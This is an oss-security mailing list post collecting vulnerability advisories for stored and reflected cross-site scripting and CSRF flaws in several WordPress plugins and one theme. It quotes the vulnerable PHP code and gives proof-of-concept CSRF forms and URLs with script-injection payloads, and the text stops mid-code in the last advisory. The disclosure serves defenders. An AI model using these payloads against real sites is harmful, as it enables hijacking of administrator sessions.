Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 1 Mar 2017 07:16:47 +0100
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple Cross-Site Scripting vulnerabilities affecting various
 WordPress Plugins

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.


------------------------------------------------------------------------
Admin Custom Login WordPress plugin affected by persistent Cross-Site
Scripting via Logo URL field
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting vulnerability has been encountered in
the Admin Custom Login WordPress plugin. This issue allows an attacker
to perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. The
"logo_url" field does not validate <script> tags and does not perform
output encoding. 

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was succesfully tested on the Admin Custom Login [2]
WordPress plugin version 2.4.5.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Admin custom login plugin give ability to customize your WordPress admin
login page according to you.

Pugin allows to change background color, background image, background
slide show, login form color, login form font size, login form position,
add social media icon on form and many more features.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
As an admin, it's possible to upload a logo on the login page. The
"logo_url" field does not validate <script> tags and does not perform
output encoding. 

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=admin_custom_login"
method="POST">
			<input type="hidden" name="Action" value="logoSave"/>
			<input type="hidden" name="logo_image"
value="http://<target>/wp-content/uploads/2016/06/scriptalert1script.jpeg"/>
			<input type="hidden" name="logo_width" value="200"/>
			<input type="hidden" name="logo_height" value="60"/>
			<input type="hidden" name="logo_url"
value="&quot;><script>alert(1)</script>"/>
			<input type="hidden" name="logo_url_title" value="\\\\"/>
			<input type="submit"/>
		</form>
	</body>
</html>


After this request is executed, re-open the admin panel of WordPress and
visit the Admin Custom Login page.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/admin_custom_login_wordpress_plugin_affected_by_persistent_cross_site_scripting_via_logo_url_field.html
[2] https://wordpress.org/plugins/admin-custom-login/
------------------------------------------------------------------------
Admin Custom Login WordPress plugin custom login page affected by
persistent Cross-Site Scripting
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting vulnerability has been encountered in
the Admin Custom Login WordPress plugin. This issue allows an attacker
to perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. There
is an option in this plugin to add custom style on the login page of
wordpress. If you simply close the </style> tags you are able to put
malicious script which will be executed on the login page.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was succesfully tested on the Admin Custom Login [2]
WordPress plugin version 2.4.5.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Admin custom login plugin give ability to customize your WordPress admin
login page according to you.

Pugin allows to change background color, background image, background
slide show, login form color, login form font size, login form position,
add social media icon on form and many more features.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
It is possible as an Admin to put XSS on login page, but more
interesting is the lack of CSRF, so if you can trick a logged-in admin
to open a link with code below XSS will be added to the login page.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=admin_custom_login"
method="POST">
			<input type="hidden" name="Action" value="loginbgSave" />
			<input type="hidden" name="login_form_position" value="default" />
			<input type="hidden" name="Login_bg_value" value="undefined" />
			<input type="hidden" name="login_background_color" value="" />
			<input type="hidden" name="login_bg_color_overlay" value="undefined"
/>
			<input type="hidden" name="login_bg_image" value="" />
			<input type="hidden" name="login_form_opacity" value="10" />
			<input type="hidden" name="login_form_width" value="300" />
			<input type="hidden" name="login_form_radius" value="3" />
			<input type="hidden" name="login_border_style" value="undefined" />
			<input type="hidden" name="login_border_thikness" value="3" />
			<input type="hidden" name="login_border_color" value="" />
			<input type="hidden" name="login_bg_repeat" value="undefined" />
			<input type="hidden" name="login_bg_position" value="undefined" />
			<input type="hidden" name="login_enable_shadow" value="no" />
			<input type="hidden" name="login_shadow_color" value="" />
			<input type="hidden" name="login_custom_css"
value="<h1>test</h2></style><script>alert(5)</script>" />
			<input type="hidden" name="login_form_left" value="700" />
			<input type="hidden" name="login_form_top" value="300" />
			<input type="hidden" name="login_form_float" value="center" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/admin_custom_login_wordpress_plugin_custom_login_page_affected_by_persistent_cross_site_scripting.html
[2] https://wordpress.org/plugins/admin-custom-login/
------------------------------------------------------------------------
Cross-Site Request Forgery & Cross-Site Scripting in Contact Form
Manager WordPress Plugin
------------------------------------------------------------------------
Edwin Molenaar [2], July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
 It was discovered that Contact Form Manager does not protect against
Cross-Site Request Forgery. This allows an attacker to change arbitrary
Contact Form Manager settings. In addtion, the plugin also fails to
apply proper output encoding, rendering it vulnerable to stored
Cross-Site Scripting.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160718-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
These issues were successfully tested on Contact Form Manager [3]
WordPress Plugin version 

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Contact Form Manager [3] WordPress Plugin lets users create and
manage multiple customized contact forms for their website. It supports
a wide range of contact form elements such as text field, email field,
textarea, dropdown list, radio button, checkbox, date picker, captcha,
and file uploader. It was discovered that Contact Form Manager does not
protect against Cross-Site Request Forgery. This allows an attacker to
change arbitrary Contact Form Manager settings. In addtion, the plugin
also fails to apply proper output encoding, rendering it vulnerable to
stored Cross-Site Scripting.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
These issues exists, because the plugin lacks an anti-CSRF token. Also
improper filtering/output encoding is done on $_POST parameters. These
issues are present in the filed contact-form-manager/admin/add_smtp.php
and contact-form-manager/admin/form-edit.php.

The username input field on the XYZ Contact > SMTP Settings is
vulnerable for Cross-Site Scripting, as wel as the Contact Form Name
input field on the XYZ Contact > Contact Form page.

SMTP Settings URL:
http://<target>/wp-admin/admin.php?page=contact-form-manager-manage-smtp

Contact Forms URL:
http://<target>/wp-admin/admin.php?page=contact-form-manager-managecontactformsp

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form id="f1" method="POST"
action="http://<target>/wp-admin/admin.php?page=contact-form-manager-manage-smtp&action=add-smtp">
			<table>
				<tr><td>xyz_cfm_SmtpAuthentication<td><input
name="xyz_cfm_SmtpAuthentication" value="true" size="100"></tr>
				<tr><td>xyz_cfm_SmtpEmailAddress<td><input
name="xyz_cfm_SmtpEmailAddress" value="<svg
onload=alert(document.domain)>" size="100"></tr>
				<tr><td>xyz_cfm_SmtpHostName<td><input name="xyz_cfm_SmtpHostName"
value="<svg onload=alert(document.domain)>" size="100"></tr>
				<tr><td>xyz_cfm_SmtpPassword<td><input name="xyz_cfm_SmtpPassword"
value="<svg onload=alert(document.domain)>" size="100"></tr>
				<tr><td>xyz_cfm_SmtpPortNumber<td><input
name="xyz_cfm_SmtpPortNumber" value="25" size="100"></tr>
				<tr><td>xyz_cfm_SmtpSecuirity<td><input name="xyz_cfm_SmtpSecuirity"
value="notls" size="100"></tr>
			</table>
		</form>
		<button
onclick="document.getElementById('f1').submit()">Submit</button>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_request_forgery___cross_site_scripting_in_contact_form_manager_wordpress_plugin.html
[2] https://www.linkedin.com/in/edwinmolenaar
[3] https://wordpress.org/plugins/contact-form-manager/
------------------------------------------------------------------------
Cross-Site Scripting in Alpine PhotoTile for Instagram WordPress Plugin
------------------------------------------------------------------------
Antonis Manaras, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Alpine PhotoTile
for Instagram WordPress Plugin. This issue allows an attacker to perform
a wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160725-0010

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Alpine PhotoTile for Instagram [2]
WordPress Plugin version 1.2.7.7.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Alpine PhotoTile for Instagram [2] is a simple, stylish, and compact
plugin for displaying Instagram photos in a sidebar, post, or page. A
Cross-Site Scripting vulnerability was found in the Alpine PhotoTile for
Instagram WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
A reflected Cross-Site Scripting vulnerability exists in the Alpine
Photo Tile for Instagam WordPress plugin. This vulnerability allows an
attacker to perform any action with the privileges of the admin user.
The affected code is not protected with an anti-Cross-Site Request
Forgery token. Consequently, it can be exploited by luring the target
user into clicking a specially crafted link or visiting a malicious
website (or advertisement).

The vulnerability exists in the
alpine-photo-tile-for-instagram/gears/alpinebot-admin.php file on line
887:

	+ '&client_id=<?php echo $_POST['client_id']; ?>'

The vulnerability can be exploited using specially crafted URL
parameter. In order to exploit this issue the target user must click a
specially crafted link or visit a malicious website (or advertisement).

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=add"
method="POST">
			<input type="hidden" name="hidden" value="Y" />
			<input type="hidden" name="add&#45;user" value="Y" />
			<input type="hidden" name="client&#95;id"
value="&lt;&#47;script&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;1&#41;&#32;&#47;&gt;"
/>
			<input type="hidden" name="client&#95;secret" value="bar" />
			<input type="hidden"
name="alpine&#45;photo&#45;tile&#45;for&#45;instagram&#45;settings&#95;add&#91;submit&#45;add&#93;"
value="Add&#32;and&#32;Authorize&#32;New&#32;User" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_alpine_phototile_for_instagram_wordpress_plugin.html
[2] https://wordpress.org/plugins/alpine-photo-tile-for-instagram/
------------------------------------------------------------------------
Cross-Site Scripting in Atahualpa WordPress Theme
------------------------------------------------------------------------
Spyros Gasteratos, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A number of Cross-Site Scripting vulnerabilities were found in the
Atahualpa WordPress Theme. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to use the CSRF vulnerability
described in SFY20160759 [2] to trick the admin into storing malicious
input.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0004

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Atahualpa WordPress Theme [3]
WordPress Theme.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Atahualpa v3.7.24 has it's own theme Options page where administrators
can tweak lots of settings including feed links, comments, website
appearance et cetera. Internally the settings submission is handled by
forms submitting a number of POST requests. However, when the settings
get auto-filled back into the form, input is not escaped in many places,
instead it is returned to the user as plaintext. Atahualpa's settings
allow customisation of various fields such as comments, feed links
etcetera.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Providing any of the following fields with string such as:
"><script>alert(1);</script> results in the script element getting
appended after the respective input element when the request returns
from the server:

"comment_feed_link",
"home_cat_menu_bar",
"email_subscribe_link",
"home_single_next_prev",
"email_subscribe_link_title",
"feedburner_email_id",
"excerpt_length",
"page_menu_bar_link_color",
"cat_menu_bar_background_color_parent",
"cat_menu_bar_link_color",
"left_col_pages_exclude",
"widget_lists link-hover-color",
"left_col2_cats_exclude"

The solution to this issue is to encode as html all the user-provided
parameters before they are returned to the browser.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
In order to reproduce the issue the following request can be replayed
using the cookies of the current admin.

<html>
	<body>
		<form
action="https://play.sfy.nl/wp-admin/themes.php?page=atahualpa-options"
method="POST">
			<input type="hidden" name="widget_container" value="margin: 0 0 15px
0;"/>
			<input type="hidden" name="widget_title_box" value=""/>
			<input type="hidden" name="widget_title" value="font-size:
1.6em;&#13;font-weight: bold;"/>
			<input type="hidden" name="widget_content" value=""/>
			<input type="hidden" name="widget_lists[li-margin-left]" value="0"/>
			<input type="hidden" name="widget_lists[link-border-left-width]"
value="7"/>
			<input type="hidden" name="widget_lists[link-border-left-color]"
value="CCCCCC"/>
			<input type="hidden"
name="widget_lists[link-border-left-hover-color]" value="000000"/>
			<input type="hidden" name="widget_lists[link-padding-left]"
value="5"/>
			<input type="hidden" name="widget_lists[link-weight]"
value="normal"/>
			<input type="hidden" name="widget_lists[link-color]" value="666666"/>
			<input type="hidden" name="widget_lists[link-hover-color]"
value="000000"/>
			<input type="hidden" name="widget_lists2[li-margin-left]" value="5"/>
			<input type="hidden" name="widget_lists2[link-border-left-width]"
value="7"/>
			<input type="hidden" name="widget_lists2[link-border-left-color]"
value="CCCCCC"/>
			<input type="hidden"
name="widget_lists2[link-border-left-hover-color]" value="000000"/>
			<input type="hidden" name="widget_lists2[link-padding-left]"
value="5"/>
			<input type="hidden" name="widget_lists2[link-weight]"
value="normal"/>
			<input type="hidden" name="widget_lists2[link-color]"
value="666666"/>
			<input type="hidden" name="widget_lists2[link-hover-color]"
value="000000"/>
			<input type="hidden" name="widget_lists3[li-margin-left]" value="5"/>
			<input type="hidden" name="widget_lists3[link-border-left-width]"
value="7"/>
			<input type="hidden" name="widget_lists3[link-border-left-color]"
value="CCCCCCw66ar&quot;><script>alert(1)</script>ljgl1"/>
			<input type="hidden"
name="widget_lists3[link-border-left-hover-color]" value="000000"/>
			<input type="hidden" name="widget_lists3[link-padding-left]"
value="5"/>
			<input type="hidden" name="widget_lists3[link-weight]"
value="normal"/>
			<input type="hidden" name="widget_lists3[link-color]"
value="666666"/>
			<input type="hidden" name="widget_lists3[link-hover-color]"
value="000000"/>
			<input type="hidden" name="category_widget_display_type"
value="inline"/>
			<input type="hidden" name="select_font_size" value="Default"/>
			<input type="hidden" name="save" value=""/>
			<input type="hidden" name="action" value="save"/>
			<input type="hidden" name="category" value="widgets"/>
			<input type="submit"/>
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_atahualpa_wordpress_theme.html
[2] https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_atahualpa_wordpress_theme.html
[3] https://wordpress.org/themes/atahualpa/
------------------------------------------------------------------------
Cross-Site Scripting in Google Analytics Dashboard WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Google Analytics
Dashboard WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0026

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Google Analytics Dashboard [2]
WordPress Plugin version 2.1.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Google Analytics Dashboard [2] WordPress Plugin gives access to your
Google Analytics data directly inside your WordPress blog. A Cross-Site
Scripting vulnerability was found in the Google Analytics Dashboard
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists in the file gad-admin-options-ui.php and is caused due
to the lack of output encoding on the ga_email option/request parameter.

<tr valign="top">
	<th scope="row">
		<label for="ga_email"><?php _e( 'Google Analytics Email',
'google-analytics-dashboard' ); ?></label></th>
	<td>
		<input name="ga_email" type="text" size="15" id="ga_email"
class="regular-text" value="<?php echo isset( $_POST['ga_email'] ) ?
$_POST['ga_email'] : get_option( 'gad_login_email' ); ?>" />
	</td>
</tr>

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=google-analytics-dashboard%2Fgad-admin-options.php"
method="POST">
			<input type="hidden" name="gad&#95;login&#95;type" value="client" />
			<input type="hidden" name="ga&#95;email"
value="&quot;><script>alert(1);</script>" />
			<input type="hidden" name="ga&#95;pass" value="password" />
			<input type="hidden" name="ga&#95;save&#95;pass"
value="ga&#95;save&#95;pass" />
			<input type="hidden" name="SubmitLogin" value="Login&#32;?&#187;" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_google_analytics_dashboard_wordpress_plugin.html
[2] https://wordpress.org/plugins/google-analytics-dashboard/
------------------------------------------------------------------------
Cross-Site Scripting in Magic Fields 1 WordPress Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A reflected Cross-Site Scripting vulnerability has been encountered in
the Magic Fields 1 WordPress plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0019

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Magic Fields 1 [2] version 1.7.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is addressed in the 1.7.2 [3] version of Magic Fields 1. You
can obtain the most recent version on the following location:
https://github.com/hunk/Magic-Fields/releases [4]

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Magic Fields is a WordPress plugin that allows for easy creation of
custom fields in various post types in a WordPress post. A reflected
Cross-Site Scripting vulnerability was found in Magic Fields that allows
an attacker to perform a wide variety of actions, such as stealing
administrators' session tokens, or performing arbitrary actions on their
behalf. To exploit this issue an attacker needs to lure a user with
administrator privileges to a page controlled by the attacker or trick
him into clicking a malicious link.
                                                                        
                                                                        
                                                                        
                                                       
[h3]Details[/h3]                                                        
                                                                        
                                                                        
                                                       
Cross-Site Scripting (XSS) attacks are a type of injection, in which
malicious scripts are injected into otherwise benign and trusted
websites. XSS attacks occur when an attacker uses a web application to
send malicious code, generally in the form of a browser script, to a
different end user. Flaws that allow these attacks to succeed are quite
widespread and occur when a web application uses input from a user
without validating or encoding it. Reflected XSS occurs when user input
is immediately returned by a web application in an error message, search
result, or any other response that includes some or all of the input
provided by the user as part of the request.
 
The plugin has several instances where XSS is possible due to lacking
output encoding and user input sanitization:
1. The custom-write-panel-id field does not validate <script> tags and
does not perform output encoding. Proof of concept code that
demonstrates this issue is listed in the proof of concept section.
2. The value of the custom-group-id parameter in the
RCCWP_CreateCustomFieldPage.php file is insufficiently validated:
53: echo $_GET['custom-group-id'];3. The value of the custom-field-css
parameter in the RCCWP_CreateCustomFieldPage.php file is insufficiently
validated:
53: echo $_POST['custom-field-css'];

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
Proof of concept code that demonstrates the Cross-Site Scripting in the
custom-write-panel-id field is listed below: 
http://<targetsite>/wp-admin/admin.php?page=MagicFieldsMenu&custom-write-panel-id=1"
/><script>alert(1)</script>&mf_action=finish-create-custom-field

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_magic_fields_1_wordpress_plugin.html
[2] http://magicfields.org/
[3] https://github.com/hunk/Magic-Fields/releases/tag/1.7.2
[4] https://github.com/hunk/Magic-Fields/releases
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Gwolle Guestbook WordPress Plugin
------------------------------------------------------------------------
Radjnies Bhansingh, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Gwolle Guestbook
[2] WordPress plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure a WordPress user with editor or
administrator privileges into opening a malicious website. 

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0033

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was succesfully tested on the Gwolle Guestbook [2] WordPress
Plugin version 1.7.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue was fixed in Gwolle Guestbook version version 2.1.1. The most
recent version of Gwolle Guestbook can be obtained from the following
location:
https://wordpress.org/plugins/gwolle-gb/ [2]

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Gwolle Guestbook for WordPress is a guestbook made in order to provide
an easy and slim way to integrate a guestbook into your WordPress
powered site. Don't use your 'comment' section the wrong way - install
Gwolle Guestbook and have a real guestbook.

A Cross-Site Scripting vulnerability was found in Gwolle Guestbook. This
issue allows an attacker to perform a wide variety of actions, such as
stealing Administrators' session tokens, or performing arbitrary actions
on their behalf. 

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue can be exploited by an anonymous attacker that sends a
Cross-Site Scripting payload via one of the input fields of the
guestbook. These fields are visible in the guestbook entries tab.
Whenever an editor or administrator reviews the entry the payload is
executed. 

An example of this vulnerability exists in the
/gwolle-gb/admin/page-editor.php file on line 434:
<input type="text" name="gwolle_gb_author_origin" tabindex="3"
class="wp-exclude-emoji" placeholder="<?php _e('City', 'gwolle-gb'); ?>"
value="<?php echo gw    olle_gb_sanitize_output(
$entry->get_author_origin() ); ?>" id="author_origin" />

------------------------------------------------------------------------
Proof of Concept
------------------------------------------------------------------------
A proof of concept attack is listed below:

<html>
	<body>
		<form action="https://<target>/" method="POST">
			<input type="hidden" name="gwolle_gb_function" value="add_entry"/>
			<input type="hidden" name="gwolle_gb_book_id" value="1"/>
			<input type="hidden" name="gwolle_gb_author_name" value="John"/>
			<input type="hidden" name="gwolle_gb_author_origin"
value="amsterdam&quot; onmouseover=alert(1) a=&quot;"/>
			<input type="hidden" name="gwolle_gb_author_email"
value="john&#64;d&#46;oe"/>
			<input type="hidden" name="gwolle_gb_author_website" value=""/>
			<input type="hidden" name="gwolle_gb_subject" value=""/>
			<input type="hidden" name="gwolle_gb_content"
value="hi&#44;&#32;cool"/>
			<input type="hidden" name="gwolle_gb_wpnonce" value="<valid nonce>"/>
			<input type="hidden" name="gwolle_gb_submit" value="Submit"/>
			<input type="submit"/>
		</form>
	</body>
</html>


A victim editor or administrator then needs to open the following view
page:
http://<target>/wp-admin/admin.php?page=gwolle-gb/editor.php&entry_id=13

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_gwolle_guestbook_wordpress_plugin.html
[2] https://wordpress.org/plugins/gwolle-gb/
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Tribulant Slideshow Galleries
WordPress Plugin
------------------------------------------------------------------------
Spyros Gasteratos, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Tribulant
Slideshow Galleries WordPress Plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. In
order to exploit this issue, the attacker has to lure/force a logged on
WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160714-0016

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Tribulant Slideshow Galleries [2]
WordPress Plugin version 1.6.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
A fix for this issue is not available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Tribulant Slideshow Galleries [2] WordPress Plugin allows you to
feature WordPress content in a beautiful and fast JavaScript-powered
slideshow gallery. A Cross-Site Scripting vulnerability has been found
in the Tribulant Slideshow Galleries plugin. This issue allows an
attacker to perform a wide variety of actions, such as stealing
Administrators' session tokens, or performing arbitrary actions on their
behalf. In order to exploit this issue, the attacker has to lure/force a
logged on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
A reflected cross site scripting vulnerability exists in the plugin
Slideshow Galleries. This issue is due to to the fact that the
view/admin/galleries/index.php file uses the following code to output an
HREF link:
"<a href="<?php echo GalleryHtmlHelper::retainquery('orderby=id&order='
.(($orderby == "id") ? $otherorder : "asc")); ?>">"

The above code fails to perform any output encoding on the retainquery
method, thus allowing the tag to be closed and to inject a script
element:
/wp-admin/admin.php?page=slideshow-galleries&method=save"><script>alert(1)<%2fscript>pwned

Please note that this particular method is called another 19 times in
the project. This indicates that more similar vulnerabilities could
exist in the code.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<target>/wp-admin/admin.php?page=slideshow-galleries&method=savegtlcq%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Exsxa2

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_tribulant_slideshow_galleries_wordpress_plugin.html
[2] https://wordpress.org/plugins/slideshow-gallery/
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Trust Form WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Trust Form
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0018

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Trust Form [2] WordPress Plugin
version 2.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Trust Form [2] WordPress Plugin is a contact form with confirmation
screen and mail and data base support. A Cross-Site Scripting
vulnerability was found in the Trust Form WordPress Plugin. This issue
allows an attacker to perform a wide variety of actions, such as
stealing Administrators' session tokens, or performing arbitrary actions
on their behalf. In order to exploit this issue, the attacker has to
lure/force a logged on WordPress Administrator into opening a malicious
website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in several PHP files and is caused by the lack of
output encoding on the page request parameter. The vulnerable code is
listed below.

edit-list.php:

<input type="hidden" name="page" value="<?php echo $_REQUEST['page'];
?>" />

entries-list.php:

<input type="hidden" name="page" value="<?php echo $_REQUEST['page']
?>"; />

trust-form.php:

$trash_url  = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'trash', $this->id, $item['ID'] );
	
[...]
	
        $read_url = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'read', $this->id, $item['ID'] );
	
[...]
	
                'view'     => sprintf( '<a
href="?page=%s&action=%s&form=%s&entry=%s">'.__( 'View',
TRUST_FORM_DOMAIN ).'</a>', $_REQUEST['page'], 'edit', $this->id,
$item['ID'] ),
	
[...]
	
        $new_url = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'new', $this->id, $item['ID'] );
	
[...]
	
                'view'     => sprintf( '<a
href="?page=%s&action=%s&form=%s&entry=%s">'.__( 'View',
TRUST_FORM_DOMAIN ).'</a>', $_REQUEST['page'], 'edit', $this->id,
$item['ID'] ),
	
[...]
	
$trash_url  = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'trash', $this->id, $item['ID'] );
	
[...]
	
$read_url = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'read', $this->id, $item['ID'] );
	
[...]
	
        'view'     => sprintf( '<a
href="?page=%s&action=%s&form=%s&entry=%s">'.__( 'View',
TRUST_FORM_DOMAIN ).'</a>', $_REQUEST['page'], 'edit', $this->id,
$item['ID'] ),
	
[...]
	
$trash_url  = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
,$_REQUEST['page'], 'trash', $this->id, $item['ID'] );
	
[...]
	
$new_url = sprintf( '?page=%s&action=%s&form=%s&entry=%s'
